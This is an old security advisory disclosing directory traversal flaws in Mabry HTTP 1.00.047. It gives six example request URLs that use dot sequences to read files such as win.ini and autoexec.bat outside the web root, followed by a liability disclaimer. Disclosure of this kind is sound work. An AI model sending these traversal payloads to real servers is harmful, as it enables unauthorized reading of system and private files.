MABRY HTTP Directory Traversal Vulnerabilities

Release Date:
July 10, 2003

Severity:
Root Compromise

Systems Affected:
Mabry HTTP 1.00.047


Description:
A directory traversal vulnerability in the product allows remote attackers to view the
content of files that reside outside the bounding HTML root directory.


When attacker sends a request to server in the following form:

http://127.0.0.1/........../windows/win.ini
http://127.0.0.1/........./autoexec.bat
http://127.0.0.1/.../.../.../.../.../.../scandisk.log
http://127.0.0.1/../../../../../../../../../autoexec.bat
http://127.0.0.1/../../../../../../../../windows/win.ini
http://127.0.0.1/.html/............/autoexec.bat

The server will return the requested files:>


Disclaimer
---------
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or 
indirect damages caused by the information or the code
provided here.



Acknowledgements
----------------
Vulnerabillity found and tested by dr_insane

______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
http://www.pathfinder.gr - Δωρεάν mail από τον Pathfinder!